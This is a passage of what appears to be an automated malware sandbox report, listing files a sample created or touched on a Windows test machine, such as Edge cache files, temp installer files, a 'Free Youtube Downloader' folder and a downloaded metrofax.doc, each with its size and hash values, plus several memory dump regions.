326f0af55cd2c896c7df20bf3f985ae9

SHA1
fe25011eedbcb67a8fd84cdf74478e1453f4546b

SHA256
0778a46b9d6c90b31842c7a1316de495a0b33eda66e9fbaf22e0bcc871d0cbf0

SHA512
e303c5126e1e5ac151c39bab0882d03477dbe58fa8124a3895af0d2afaa181aa97d7b2e68e78db5e109767a32e9ee18dc95372b360f1007c75d1e7f4f7f3adf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
194B

MD5
a48763b50473dbd0a0922258703d673e

SHA1
5a3572629bcdf5586d79823b6ddbf3d9736aa251

SHA256
9bb14ea03c24f4c3543b22a8b4e9d306b926d4950cfcc410808ecac2407409fd

SHA512
536406435e35f8204ce6d3b64850ffb656813aacbc5172af895c16c4f183005d69999c4f48f948875d9837890f290b51a7358ff974fb1efc6ba3d1592426cca1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
337B

MD5
55c8e1936ba3f0d90beeabb0fff42f68

SHA1
5ac8363de76447ffda14ea7cf84f21a267ff5b32

SHA256
81bd662b78faf880db19dc3043853009a75f506af5dbd890caaf112a8a259c5a

SHA512
3ff7f59b28fdc12d4245c9d7664a29510200321e2806780f4244223f5d2f93eceec7c8fd003318028a07afbe5142eb0b919ee950d79af8865c94a248e5fdb43c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
0003397602c5d3d4b3784a7d138fc70a

SHA1
aab79768f051e3ff2e5470995c9b0990e23072d0

SHA256
3af704b731cf9cfda9972f4b46919495cb7e8699dad6055717221dab0f3a6d0b

SHA512
4895dfbaade8f272fbbbe5e5ea9312ea6c8b106b5f4947cd4e8b168ddbef7fb4e08d49b4db4e4cc2c70060e95b0b04639a61fb154444b319e777727987e93512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
d338cf53200c2d2141e8ad59fe9079ad

SHA1
30e87419806fa4e5e5bed086af69748fdd3e193b

SHA256
01e36237e39d6dbe29db8a3ebd01b56355797f4fa427566be65ca77cbfad286d

SHA512
1b3959ef9905c139bc81320e9719b29cdd5cf4a856fd51a5db69dd95b960f6548026cbfff122b59d8ffba058990caa57774eecb98e15c2172e56b13b71f6d4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
df9c9a80c81ab055bed78afa58a80ecb

SHA1
bd154ee373ae1ee90330736811dbdfbf2a28c9fd

SHA256
f30b1a415d05e8ba287f6591f71c9964d8557bf78fcd4324bb86e0a22342c171

SHA512
8d179f4355e4e69488bdebb501058c85457a5f1f0c5d418a13ca2d73903fc1f5d2515c1979805ac48acd779af176e9345221635c4567ae7c99c73d0011d1b9d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
77d2dcef8f868fefb72c4f54546e9671

SHA1
6e239e88693992c3b4764eeaeda2f8f66b69dc52

SHA256
743804b1ae73dd843c9e3b906e18d375812e6fcb3e1b9a82f27b86e3d80f2d7a

SHA512
7b39435ff37d8d57bd6231cf4e86870196742780adc9046c0d24b010f02e5c5c144cb7cf86cf295732cc7123cc4197d6b7b05f3c1164a5f3a94b0d7b1e604109

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
cb3ec456c0f368e419d7e6b767033619

SHA1
95325fd7cc8c8c4266b9ddc658b5d7372e4bc8c9

SHA256
1bae895877e2c3d7fd50cdc913893ac40863c1dbd569b2dd24b17066b85d7b29

SHA512
3303080169d3f5867346cb3154e2e6c3d2599df2a7edc49f40dde08acfd5ac4866014002bb97727e8d44b8f0287edba3605a5357d336ac58ebe4852fd15ab836

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
651d544fbb40e8a59b872df13aebb86e

SHA1
3bab7ff09a40fbcf5a4310d7b47036bfa204439a

SHA256
e01774e3233fd8afab9d958c265463c628cfb3f2a9377a7e5b76cc9921edb94e

SHA512
d4e2d77186ebb7a40ab6e84824ec4ad795c03c572b383dbb0a28104e7c0556d9732dede3c806598c858e9cd08e95aa76fb39b1cdb1fe29c75d142b6f1f429cee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
dbcc34015615f0e5fed8c2a234b94198

SHA1
2e2649cda67592aacf7e64dc9f986d0bd2a71ca8

SHA256
028dc8de092632dde5eab570636bd86813027d6141274ea17617b4daab19b0db

SHA512
d3689a734b5b9b5aac18670a57dd1b53ccbb3c4f57b12d9b438c92a137232088362721d362e3d5bbc4e114b62b8c71e9ae4ef75973254cbff8421b6f6a662dd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
d1b9f59a2c1e9b965c20b900eedc62bb

SHA1
1d861c41c0a3dc29776937282916af42309617eb

SHA256
c9927718a50177c48d38bd170ba64b14fbd319e0d30e77e68a00b9f6341b3e0c

SHA512
f23ca33efc6efb5948d89c470842192f3b34526322cec1f0ba125ca1dd81eb5b018977529ecde6fcb55496a4e46c599753f72c31b8454685b1a2a1b83fa83691

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
15cda41dd641e987c3c2ba21e6ba7b7e

SHA1
979f3019f666d03ca0797fa059284c106b270e85

SHA256
a25a3a20df67440ea354c1d48e34417306aecbc2e4810507bba04c72ea786a0b

SHA512
ef9223e1cbdfd25d1841077572cbe1a46a74ac41ec67915e14a0db2b06a461eb6b52d9e8bb81842ddda88f169c8ce9d7781c3362714e87861e985e4ae59bcd72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ed548a3c83f160199b383956523f08a5

SHA1
9baa6548262026d8edef502f1b31292f970b272d

SHA256
b0d59d7c5f63d4a7ed6d93c10f2514924dde9e5cb175c55fbf082640ed612290

SHA512
41fea182836c2c416d72825ef7b9359147635baa8945ae65e526ef52b97202937b74357e66aadf209b531fed8f07ad153288b99915a502420df198e888ad68da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

Filesize
4B

MD5
5fcb95589838ca2a7496f33fa1eb6efe

SHA1
a29463902a96852af5ab9ef3ae04e08e2c9ebb73

SHA256
9b192f04155690439464bdd52e092e5b618e0ce7a1c5f41a3f0a70c7e9a3d0b5

SHA512
242ae60fc20b95b619de27ac0a9071f947c7fb670a2c6f9c476ca06f2022385c86b639bc1b7ddf781584743576778abe6ad860ae6729f2369f803e622db8b094

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

Filesize
4KB

MD5
164c6eac15e917fcb7a2d8821b83175b

SHA1
bf20511e5529c98e5d2b28c6405c402d5df7f6f9

SHA256
e1b5ce0ef0588b22bfae85444d3849abddfc8d1da4c9a1fe8bc117d5af8cb703

SHA512
cd749a83b196d87e21b7e50b945e64d8ba662b888cce4e8a0b3e7b1619ac5b4cbda7c1ac20ff04c96c7f8b1ff762b08611ffe592de028e2422d5f85bc612ffeb

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

Filesize
36B

MD5
8708699d2c73bed30a0a08d80f96d6d7

SHA1
684cb9d317146553e8c5269c8afb1539565f4f78

SHA256
a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

SHA512
38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\temp_0.tmp

Filesize
176KB

MD5
bc82784f4aa47bcfed93e81a3b9950f2

SHA1
f5f2238d45733a6dde53c7b7dfe3645ee8ae3830

SHA256
dd47684334f0a2b716e96f142e8915266d5bc1725853fd0bdc6d06148db6167f

SHA512
d2378f324d430f16ce7dcf1f656b504009b005cdb6df9d5215fe0786c112e8eba8c1650a83192b6a9afad5892a1a456714665233f6767765619ccb5ff28e2b8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI2AB9.tmp

Filesize
421KB

MD5
6425466b9a37d03dafcba34f9d01685a

SHA1
2489ed444bce85f1cbcedcdd43e877e7217ae119

SHA256
56f8ca5b2079bc97a7af9c015ed4b6163635baef0d9a287d19fc227fc330c53d

SHA512
62f4c79d165282db14b662d4242a065af4c8a642f2023032ab5a059e2d6001f0b80e9a0562989013acf01a80a67491be9b671e6bd99220cf9d4fb44a17719371

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xvv4scje.drj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\{09EAD19A-804B-444F-B17C-15F8C5837E63}\BException.dll

Filesize
142KB

MD5
a2d4928c9836812735b3516c6950a9ec

SHA1
01873285eec57b208fa2d4b71d06f176486538c8

SHA256
79ca108d5c51259d8fb38ed1cfcc5a70e9cf67a5954e52a4339b39ff04fa20c8

SHA512
d03964a2bb597bf0fdefb787de3b462010c4cd02d286b16587a03b5228553a307d1b8f472c312e0d8bb53f21570aa5b112d85193cf42b83ef33fb7905855eba7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
2f04aa11bb4be5421ad86780ff77d977

SHA1
b02da8b63c9ab70df7aaeec8fd51737ec9b52055

SHA256
33c2afb795c1a53c880c442f8f4c694f3714908dddeb0f67970af323538dd44c

SHA512
a5784af5dc96e7ae118b32eee85da769615707bfee419eec24accee214801f4db45023b5645994ca456b3da1b71fb7c2a6beed1f0a51eca4160be21e75228c96

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
47d6e12adf63ee70d01d9b98057e5667

SHA1
83245085aa167e04c5b8a03bea044e18521597c9

SHA256
a2598f69de8556cde555a9a604e0762df2fbc678f47a454f9f9f5057e3d3e1d1

SHA512
f4a645fb3839721bd9af514910d5842a03fceaf7113dd9159fb32e85b21c1419be40debbd3bc2833c66cef817b156197faa43f5977792c8f8591d351081e60d6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
3552752595448a22153c9abccdb44de1

SHA1
8dfce0e1a47e23275577e45a5de233c4274f7750

SHA256
8dd9a44dd32f5bacea4fce4ad49862ad37a237cd9cd8b7c71f8be9109abc6601

SHA512
53f948d8f4fdebab4f9c7d1902a554b73fa9d9c2dbe37769ad93ab71ac8ab30df9631b86bef27e2136bee182e8af63de4a4fc59faedc9834fd0341ca15a62fdf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
e66a1a893ee17ba174cdbcf3cc957d35

SHA1
8d1994adfc1791accf8aa28e9feb6f08796e1699

SHA256
dcd1c5701f95f3de508a1ef8628dc10e4f861ba7c6b1dd12b06fc54505ad7da7

SHA512
43b6b3eeaabeb0b0940216f0b298b5d457b3a4cadc116534601c0e28c2c68ee4fb7cbcc09ee7e9364d65e94454da76f650937721be8889a67c9ccfb690f2890f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
29d895423833b80fb2bfe26315e3baba

SHA1
16b678f376cca2a8ba6e06e25e248d9f73c2c0e0

SHA256
ffae01b160c400a00bb2fecd24c7facc70c3e2496415ccab7b85c596bad280af

SHA512
22ea461f097b9c1489f6857b7d91c30554fdf1659fdcf4b59157ad3d621263b4d4a37e10fb2cb0b8b9e8ef8d73466a75f6f902333da83af607195f1596c0255c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
4db32d822be71b43aa45d3354789d1d5

SHA1
5b25af534f5faa91f41110de0e047e8799004440

SHA256
cef7e38baa9bea2fc420d200c0d9892fae22cc574aa0bc2402ac646831132cc0

SHA512
5832fafcf9e127451a018cb9d59337f4ff0a276d9c658c2ee1e9fa5a61d6c25acb8ffc2db91589bc3f695dc7dacb7460196645786cab9546a534f764cbb4311f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
b91c245a3a361b47db0744fa380ec90b

SHA1
b873c173661bee780f0ac5c9eac2ea243bbf1f0b

SHA256
401574922059c8398bb9b292a152bdb19e020f601001e8bed56c3bf0f3e8c8e7

SHA512
7897198f81d1ad22a367d5ec2d5b12de7cde1e55efc5348646358f05cfe112dfa059c828fdeed40d22647b5c793e1cf84998554c5adbf8593c1983346725484e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
4e3198dc727a30e55eb6e221fc17f7f4

SHA1
982c8e4678d02d0a8d55e09f8070b1cd6455a8e8

SHA256
e9235fbb995fa8ebfef76d7d09213a36eed8981d5094b5f04147a6bdf93ae771

SHA512
d3e3061eaa388ff2140b8243a802cadda6b87ed0bd1210012a3af040d6c2ab6eb93b650f44b6987a8f8e577b2e3a78c913f2c4d9a61250ee158af9b49de874b2

Download Submit
C:\Users\Admin\Downloads\BabylonToolbar.txt

Filesize
57B

MD5
2ab0eb54f6e9388131e13a53d2c2af6c

SHA1
f64663b25c9141b54fe4fad4ee39e148f6d7f50a

SHA256
d24eee3b220c71fced3227906b0feed755d2e2b39958dd8cd378123dde692426

SHA512
6b5048eeff122ae33194f3f6089418e3492118288038007d62cdd30a384c79874c0728a2098a29d8ce1a9f2b4ba5f9683b3f440f85196d50dc8bc1275a909260

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 314583.crdownload

Filesize
4KB

MD5
93ceffafe7bb69ec3f9b4a90908ece46

SHA1
14c85fa8930f8bfbe1f9102a10f4b03d24a16d02

SHA256
b87b48dcbf779b06c6ca6491cd31328cf840578d29a6327b7a44f9043ce1eb07

SHA512
c1cb5f15e2487f42d57ae0fa340e29c677fe24b44c945615ef617d77c2737ce4227d5a571547714973d263ed0a69c8893b6c51e89409261cdbedff612339d144

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 717079.crdownload

Filesize
2KB

MD5
a56d479405b23976f162f3a4a74e48aa

SHA1
f4f433b3f56315e1d469148bdfd835469526262f

SHA256
17d81134a5957fb758b9d69a90b033477a991c8b0f107d9864dc790ca37e6a23

SHA512
f5594cde50ca5235f7759c9350d4054d7a61b5e61a197dffc04eb8cdef368572e99d212dd406ad296484b5f0f880bdc5ec9e155781101d15083c1564738a900a

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 72519.crdownload

Filesize
396KB

MD5
13f4b868603cf0dd6c32702d1bd858c9

SHA1
a595ab75e134f5616679be5f11deefdfaae1de15

SHA256
cae57a60c4d269cd1ca43ef143aedb8bfc4c09a7e4a689544883d05ce89406e7

SHA512
e0d7a81c9cdd15a4ef7c8a9492fffb2c520b28cebc54a139e1bffa5c523cf17dfb9ffe57188cf8843d74479df402306f4f0ce9fc09d87c7cca92aea287e5ff24

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 72519.crdownload:SmartScreen

Filesize
7B

MD5
4047530ecbc0170039e76fe1657bdb01

SHA1
32db7d5e662ebccdd1d71de285f907e3a1c68ac5

SHA256
82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750

SHA512
8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

Download Submit
C:\Users\Admin\Downloads\metrofax.doc

Filesize
221KB

MD5
28e855032f83adbd2d8499af6d2d0e22

SHA1
6b590325e2e465d9762fa5d1877846667268558a

SHA256
b13b29772c29ccb412d6ab360ff38525836fcf0f65be637a7945a83a446dfd5e

SHA512
e401cbd41e044ff7d557f57960d50fb821244eaa97ce1218191d58e0935f6c069e6a0ff4788ed91ead279f36ba4eddfaa08dc3de01082c41dc9c2fc3c4b0ae34

Download Submit
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe

Filesize
438KB

MD5
1bb4dd43a8aebc8f3b53acd05e31d5b5

SHA1
54cd1a4a505b301df636903b2293d995d560887e

SHA256
a2380a5f503bc6f5fcfd4c72e5b807df0740a60a298e8686bf6454f92e5d3c02

SHA512
94c70d592e806bb426760f61122b8321e8dc5cff7f793d51f9d5650821c502c43096f41d3e61207ca6989df5bfdbff57bc23328de16e99dd56e85efc90affdce

Download Submit
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

Filesize
153KB

MD5
f33a4e991a11baf336a2324f700d874d

SHA1
9da1891a164f2fc0a88d0de1ba397585b455b0f4

SHA256
a87524035509ff7aa277788e1a9485618665b7da35044d70c41ec0f118f3dfd7

SHA512
edf066968f31451e21c7c21d3f54b03fd5827a8526940c1e449aad7f99624577cbc6432deba49bb86e96ac275f5900dcef8d7623855eb3c808e084601ee1df20

Download Submit
C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe

Filesize
110KB

MD5
139df873521412f2aebc4b45da0bc3e9

SHA1
3fd72fd5bad8ee9422fb9efa5f601f6b485404df

SHA256
efe6bd2e0fc7030994fc2837b389da22c52a7b0bbdbd41852fcaf4308a23da10

SHA512
d85cf83d3b2cf9af3076e40d7419be42a561bce1160376ba580b3078b581ed2bd6d274fb2a0767aa81a9e92052762f39c1c391ca0cac3043ad85a72862713bd3

Download Submit
memory/2252-7646-0x00000210D35B0000-0x00000210D35DE000-memory.dmp

Filesize
184KB

Download
memory/5056-2622-0x00000000006B0000-0x00000000006B1000-memory.dmp

Filesize
4KB

Download
memory/5056-2621-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/9560-7298-0x00000260C3040000-0x00000260C3062000-memory.dmp

Filesize
136KB

Download